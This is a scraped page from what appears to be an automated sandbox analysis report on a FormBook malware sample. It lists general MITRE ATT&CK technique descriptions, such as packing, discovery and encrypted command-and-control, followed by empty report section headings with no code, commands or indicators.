Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report JdtN8nIcLi8RQOi.exe

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: FormBook

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Signature Overview

AV Detection:

Compliance:

Software Vulnerabilities:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph